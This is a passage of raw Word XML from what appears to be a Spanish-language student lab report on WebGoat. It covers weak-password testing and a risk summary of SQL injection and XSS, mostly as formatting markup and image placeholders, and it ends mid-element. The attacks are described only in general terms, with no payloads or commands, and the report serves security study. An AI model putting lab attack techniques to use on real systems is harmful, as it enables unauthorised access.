          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2889C291" wp14:editId="27354C5B">
            <wp:extent cx="5612130" cy="323913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3239135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A3454D" w14:textId="77777777" w:rsidR="00682D1E" w:rsidRDefault="00682D1E" w:rsidP="0008732D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222A2EE0" w14:textId="280B7888" w:rsidR="00DF26BA" w:rsidRDefault="00DF26BA" w:rsidP="0008732D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0799B534" wp14:editId="5367F5EE">
            <wp:extent cx="5612130" cy="3286125"/>
            <wp:effectExtent l="0" t="0" r="76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3286125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B44505" w14:textId="616A770C" w:rsidR="00DF26BA" w:rsidRDefault="00DF26BA" w:rsidP="0008732D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C65F581" w14:textId="7E883026" w:rsidR="00682D1E" w:rsidRDefault="00682D1E" w:rsidP="0008732D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49AC1D49" w14:textId="6AEC608B" w:rsidR="00682D1E" w:rsidRDefault="00682D1E" w:rsidP="0008732D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0940AB56" w14:textId="77777777" w:rsidR="00682D1E" w:rsidRDefault="00682D1E" w:rsidP="0008732D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15599A7D" w14:textId="08090CEB" w:rsidR="00DF26BA" w:rsidRDefault="00106799" w:rsidP="00106799">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106799">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A7 Identity &amp; Auth Failure – Secure Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E415036" w14:textId="22ED300B" w:rsidR="00682D1E" w:rsidRDefault="00682D1E" w:rsidP="00682D1E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6DDC8C" w14:textId="3745CBD6" w:rsidR="003A53FC" w:rsidRDefault="00682D1E" w:rsidP="003A53FC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00682D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este fallo de seguridad ocurre cuando una aplicación permite a los usuarios establecer contraseñas que no cumplen con las políticas de seguridad (como longitud mínima, uso de caracteres especiales, y evitación de contraseñas comunes). Las contraseñas débiles facilitan ataques de fuerza bruta y otros métodos de cracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3E3E35" w14:textId="064912EB" w:rsidR="003A53FC" w:rsidRPr="003A53FC" w:rsidRDefault="003A53FC" w:rsidP="003A53FC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A53FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Impacto en la seguridad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE52C27" w14:textId="77777777" w:rsidR="003A53FC" w:rsidRPr="003A53FC" w:rsidRDefault="003A53FC" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A53FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Compromiso de cuentas: Los atacantes pueden adivinar contraseñas débiles para acceder a cuentas de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDBB727" w14:textId="77777777" w:rsidR="003A53FC" w:rsidRPr="003A53FC" w:rsidRDefault="003A53FC" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A53FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Escalación de privilegios: Una vez dentro, podrían explotar permisos de administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06A027" w14:textId="2EE37617" w:rsidR="00AD056D" w:rsidRDefault="003A53FC" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A53FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pérdida de datos confidenciales: Acceso no autorizado a información sensible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6736209A" w14:textId="2EC2A428" w:rsidR="00AD056D" w:rsidRDefault="00AD056D" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2070DD" w14:textId="77777777" w:rsidR="00AD056D" w:rsidRDefault="00AD056D" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0167BA8F" w14:textId="4FAAA463" w:rsidR="00AD056D" w:rsidRDefault="00AD056D" w:rsidP="00837E64">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prueba realizada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60715962" w14:textId="3313AD71" w:rsidR="00837E64" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se intenta crear un usuario con contraseña débil, como ‘123456’ la aplicación rechaza esta contraseña con advertencia, también nos demuestra como una contraseña débil es vulnerable frente a ataques de diccionarios o fuerza bruta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F18BB7" w14:textId="5085ACEA" w:rsidR="00837E64" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se ejecuta un ataque simulado y nos muestra cuantas contraseñas podrían crackearse en pocos segundos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334766D9" w14:textId="0C196371" w:rsidR="00837E64" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45089435" w14:textId="1994D1EC" w:rsidR="00837E64" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24CDD91E" wp14:editId="7ADA7C77">
            <wp:extent cx="5612130" cy="1273175"/>
            <wp:effectExtent l="0" t="0" r="762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1273175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4609BF" w14:textId="2533279E" w:rsidR="00837E64" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F24DC35" wp14:editId="021F8444">
            <wp:extent cx="5612130" cy="147256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472565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3683B0D1" w14:textId="2EF72204" w:rsidR="00837E64" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CE7BEC" w14:textId="3FA3E173" w:rsidR="00A8151B" w:rsidRDefault="00837E64" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7522786F" wp14:editId="35D90773">
            <wp:extent cx="5612130" cy="328104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2130" cy="3281045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD831F" w14:textId="7FFC1AE4" w:rsidR="00A8151B" w:rsidRDefault="00A8151B" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A0ACD8" w14:textId="1EB27F37" w:rsidR="00A8151B" w:rsidRPr="00EB697F" w:rsidRDefault="00A8151B" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ANALISIS DE RIESGOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B06769F" w14:textId="09C9C30E" w:rsidR="0039383E" w:rsidRDefault="0039383E" w:rsidP="00EB697F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4CAAD5" w14:textId="28DAAA4A" w:rsidR="0039383E" w:rsidRPr="00A8151B" w:rsidRDefault="0039383E" w:rsidP="0039383E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resumen de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5317202F" w14:textId="65788504" w:rsidR="00A8151B" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este análisis evalúa las vulnerabilidades encontradas en el entorno de practica WebGoat, relacionadas con riesgos comunes en aplicaciones reales y como mitigar dichos riesgos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B93C87D" w14:textId="4F7F3BAD" w:rsidR="00EB697F" w:rsidRDefault="00EB697F" w:rsidP="005218CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2134A3" w14:textId="77777777" w:rsidR="00EB697F" w:rsidRDefault="00EB697F" w:rsidP="005218CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4B6752" w14:textId="76AC4DD4" w:rsidR="005218CA" w:rsidRPr="005218CA" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005218CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A3 Injection - SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4DC7B5" w14:textId="5921B36F" w:rsidR="005218CA" w:rsidRPr="005218CA" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005218CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Descripción: Permite a un atacante manipular consultas SQL para acceder, modificar o eliminar datos no autorizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430DC448" w14:textId="77777777" w:rsidR="005218CA" w:rsidRPr="005218CA" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005218CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Impacto en organizaciones reales: Puede comprometer datos confidenciales, como información personal o financiera, afectando la reputación y cumplimiento legal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D354C" w14:textId="01BD0BD2" w:rsidR="005218CA" w:rsidRPr="005218CA" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005218CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Severidad: </w:t>
      </w:r>
      <w:r w:rsidRPr="005218CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Crítica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B169C" w14:textId="3C81D21F" w:rsidR="005218CA" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440FFEF6" w14:textId="372E08F3" w:rsidR="005218CA" w:rsidRPr="005218CA" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005218CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A3 Injection - Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B4F3EB" w14:textId="77777777" w:rsidR="005218CA" w:rsidRPr="005218CA" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005218CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Descripción: Inserta scripts maliciosos en sitios web legítimos, afectando a los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE3BF7" w14:textId="77777777" w:rsidR="005218CA" w:rsidRPr="005218CA" w:rsidRDefault="005218CA" w:rsidP="005218CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005218CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Impacto en organizaciones reales: Robo de credenciales, suplantación de identidad y explotación de sesiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC4C6C1" w14:textId="2781772E" w:rsidR="00EB697F" w:rsidRPr="0039383E" w:rsidRDefault="005218CA" w:rsidP="00E73482">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039383E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
